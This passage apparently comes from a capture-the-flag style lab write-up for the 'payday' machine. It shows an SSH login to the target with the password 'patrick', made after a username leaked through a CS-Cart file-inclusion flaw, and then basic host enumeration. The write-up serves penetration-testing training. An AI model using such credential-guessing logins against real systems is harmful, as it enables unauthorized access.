SSH
There’s been a username disclosure through the identified LFI vulnerability in the target CS-Cart instance
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/payday]
└─$ sshpass -p patrick ssh patrick@$IP
Unable to negotiate with 192.168.116.39 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dssThe target SSH server only supports ssh-rsa and ssh-dss
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/payday]
└─$ sshpass -p patrick ssh patrick@$IP -o HostKeyAlgorithms=+ssh-rsa
Linux payday 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Sun Feb 9 09:19:32 2025 from 192.168.45.215
patrick@payday:~$ whoami
patrick
patrick@payday:~$ hostname
payday
patrick@payday:~$ ipconfig
-bash: ipconfig: command not found
patrick@payday:~$ ifconfig
eth0 Link encap:Ethernet HWaddr 00:50:56:9E:B2:F4
inet addr:192.168.116.39 Bcast:192.168.116.255 Mask:255.255.255.0
inet6 addr: fe80::250:56ff:fe9e:b2f4/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:37768 errors:1 dropped:1 overruns:0 frame:0
TX packets:22161 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2984258 (2.8 MB) TX bytes:2142032 (2.0 MB)
Interrupt:17 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:503 errors:0 dropped:0 overruns:0 frame:0
TX packets:503 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:682031 (666.0 KB) TX bytes:682031 (666.0 KB)Initial Foothold established to the target system as the patrick user via SSH